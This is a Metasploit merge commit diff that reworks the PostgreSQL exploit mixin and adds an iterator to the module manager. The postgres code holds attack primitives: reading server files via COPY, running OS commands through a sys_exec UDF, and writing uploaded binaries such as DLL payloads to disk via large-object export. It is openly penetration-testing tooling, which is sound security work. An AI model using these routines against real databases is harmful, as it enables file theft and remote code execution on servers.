Merge branch 'rapid7' into wchen-r7-old_keywords

Author: egypt

lib/msf/core/exploit/postgres.rb

@@ -1,4 +1,3 @@
-# -*- coding: binary -*-
 require 'msf/core'
 
 module Msf
@@ -12,6 +11,7 @@ module Msf
 module Exploit::Remote::Postgres
 
 	require 'postgres_msf'
+	require 'base64'
 	include Msf::Db::PostgresPR
 	attr_accessor :postgres_conn
 
@@ -53,11 +53,11 @@ def postgres_login(args={})
 		ip = args[:server]         || datastore['RHOST']
 		port = args[:port]         || datastore['RPORT']
 		uri = "tcp://#{ip}:#{port}"
-		
+
 		if Rex::Socket.is_ipv6?(ip)
 			uri = "tcp://[#{ip}]:#{port}"
 		end
-		
+
 		verbose = args[:verbose]   || datastore['VERBOSE']
 		begin
 			self.postgres_conn = Connection.new(db,username,password,uri)
@@ -98,7 +98,6 @@ def postgres_logout
 	def postgres_query(sql=nil,doprint=false)
 		ip = datastore['RHOST']
 		port = datastore['RPORT']
-		verbose = datastore['VERBOSE']
 		postgres_login unless self.postgres_conn
 		unless self.postgres_conn
 			return {:conn_error => true}
@@ -155,18 +154,17 @@ def postgres_print_reply(resp=nil,sql=nil)
 	# postgres_fingerprint attempts to fingerprint a remote Postgresql instance,
 	# inferring version number from the failed authentication messages.
 	def postgres_fingerprint(args={})
-		postgres_logout if self.postgres_conn
+		return postgres_authed_fingerprint if self.postgres_conn
 		db = args[:database]       || datastore['DATABASE']
 		username = args[:username] || datastore['USERNAME']
 		password = args[:password] || datastore['PASSWORD']
 		rhost = args[:server]         || datastore['RHOST']
 		rport = args[:port]         || datastore['RPORT']
-		
+
 		uri = "tcp://#{rhost}:#{rport}"
 		if Rex::Socket.is_ipv6?(rhost)
 			uri = "tcp://[#{rhost}]:#{rport}"
 		end
-		
 
 		verbose = args[:verbose]   || datastore['VERBOSE']
 		begin
@@ -175,11 +173,13 @@ def postgres_fingerprint(args={})
 			version_hash = analyze_auth_error e
 			return version_hash
 		end
-		if self.postgres_conn # Just ask for the version.
-			resp = postgres_query("select version()",false)
-			ver = resp[:complete].rows[0][0]
-			return {:auth => ver}
-		end
+		return postgres_authed_fingerprint if self.postgres_conn
+	end
+
+	def postgres_authed_fingerprint
+		resp = postgres_query("select version()",false)
+		ver = resp[:complete].rows[0][0]
+		return {:auth => ver}
 	end
 
 	# Matches up filename, line number, and routine with a version.
@@ -264,7 +264,7 @@ def postgres_read_textfile(filename)
 		read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT);
 			COPY #{temp_table_name} FROM '#{filename}';
 			SELECT * FROM #{temp_table_name}}
-		read_return = postgres_query(read_query)
+		return postgres_query(read_query,true)
 	end
 
 	def postgres_has_database_privilege(priv)
@@ -291,6 +291,7 @@ def postgres_create_sys_exec(dll)
 	# This presumes the pg_temp.sys_exec() udf has been installed, almost
 	# certainly by postgres_create_sys_exec()
 	def postgres_sys_exec(cmd)
+		print_status "Attempting to Execute: #{cmd}"
 		q = "select pg_temp.sys_exec('#{cmd}')"
 		resp = postgres_query(q)
 		if resp[:sql_error]
@@ -300,10 +301,16 @@ def postgres_sys_exec(cmd)
 		return true
 	end
 
+
 	# Takes a local filename and uploads it into a table as a Base64 encoded string.
 	# Returns an array if successful, false if not.
-	def postgres_upload_binary_file(fname)
-		data = postgres_base64_file(fname)
+	def postgres_upload_binary_file(fname, remote_fname=nil)
+		data = File.read(fname)
+		postgres_upload_binary_data(data, remote_fname)
+	end
+
+	def postgres_upload_binary_data(data, remote_fname=nil)
+		data = postgres_base64_data(data)
 		tbl,fld = postgres_create_stager_table
 		return false unless data && tbl && fld
 		q = "insert into #{tbl}(#{fld}) values('#{data}')"
@@ -312,20 +319,48 @@ def postgres_upload_binary_file(fname)
 			print_error resp[:sql_error]
 			return false
 		end
-		oid, fout = postgres_write_data_to_disk(tbl,fld)
+		oid, fout = postgres_write_data_to_disk(tbl,fld,remote_fname)
 		return false unless oid && fout
 		return [tbl,fld,fout,oid]
 	end
 
 	# Writes b64 data from a table field, decoded, to disk.
-	def postgres_write_data_to_disk(tbl,fld)
+	#
+	# This is accomplished with 3 sql queries:
+	# 1. select lo_create
+	# 2. version dependant:
+	#    - on 9.x, insert into pg_largeobject
+	#    - on older versions, update pg_largeobject
+	# 3. select lo_export to write the file to disk
+	#
+	def postgres_write_data_to_disk(tbl,fld,remote_fname=nil)
 		oid = rand(60000) + 1000
-		fname = Rex::Text::rand_text_alpha(8) + ".dll"
-		queries = [
-			"select lo_create(#{oid})",
-			"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
-			"select lo_export(#{oid}, '#{fname}')"
-		]
+		remote_fname ||= Rex::Text::rand_text_alpha(8) + ".dll"
+
+		ver = postgres_fingerprint
+		case ver[:auth]
+		when /PostgreSQL 9\./
+			# 9.x does *not* insert the largeobject into the table when you do
+			# the lo_create, so we must insert it ourselves.
+			queries = [
+				"select lo_create(#{oid})",
+				"insert into pg_largeobject select #{oid}, 0, decode((select #{fld} from #{tbl}), 'base64')",
+				"select lo_export(#{oid}, '#{remote_fname}')"
+			]
+		else
+			# 8.x inserts the largeobject into the table when you do the
+			# lo_create, so we with a value.
+			#
+			# 7.x is an unknown, but this behavior was the default before the
+			# addition of support for 9.x above, so try it this way and hope
+			# for the best
+			queries = [
+				"select lo_create(#{oid})",
+				"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
+				"select lo_export(#{oid}, '#{remote_fname}')"
+			]
+		end
+
 		queries.each do |q|
 			resp = postgres_query(q)
 			if resp && resp[:sql_error]
@@ -334,15 +369,20 @@ def postgres_write_data_to_disk(tbl,fld)
 				break
 			end
 		end
-		return oid,fname
+		return oid,remote_fname
 	end
 
 	# Base64's a file and returns the data.
 	def postgres_base64_file(fname)
 		data = File.open(fname, "rb") {|f| f.read f.stat.size}
+		postgres_base64_data(data)
+	end
+
+	def postgres_base64_data(data)
 		[data].pack("m*").gsub(/\r?\n/,"")
 	end
 
+
 	# Creates a temporary table to store base64'ed binary data in.
 	def postgres_create_stager_table
 		tbl = Rex::Text.rand_text_alpha(8).downcase

lib/msf/core/module_manager.rb

@@ -36,6 +36,8 @@ class ModuleManager
     include Msf::ModuleManager::ModuleSets
     include Msf::ModuleManager::Reloading
 
+    include Enumerable
+
     #
     # CONSTANTS
     #
@@ -96,10 +98,21 @@ def create(name)
     end
 
 
-    # @param framework [Msf::Framework] The framework for which this
-    #   instance is managing the modules.
-    # @param types [Array<String>] List of module types to load.
-    #   Defaults to all module types in {Msf::MODULE_TYPES}.
+    # Iterate over all modules in all sets
+    #
+    # @yieldparam name [String] The module's reference name
+    # @yieldparam mod_class [Msf::Module] A module class
+    def each
+      module_set_by_type.each do |type, set|
+        set.each do |name, mod_class|
+          yield name, mod_class
+        end
+      end
+    end
+
+
+    # @param [Msf::Framework] framework The framework for which this instance is managing the modules.
+    # @param [Array<String>] types List of module types to load.  Defaults to all module types in {Msf::MODULE_TYPES}.
     def initialize(framework, types=Msf::MODULE_TYPES)
       #
       # defaults
@@ -158,5 +171,6 @@ def auto_subscribe_module(mod)
         framework.events.add_session_subscriber((inst) ? inst : (inst = mod.new))
       end
     end
+
   end
 end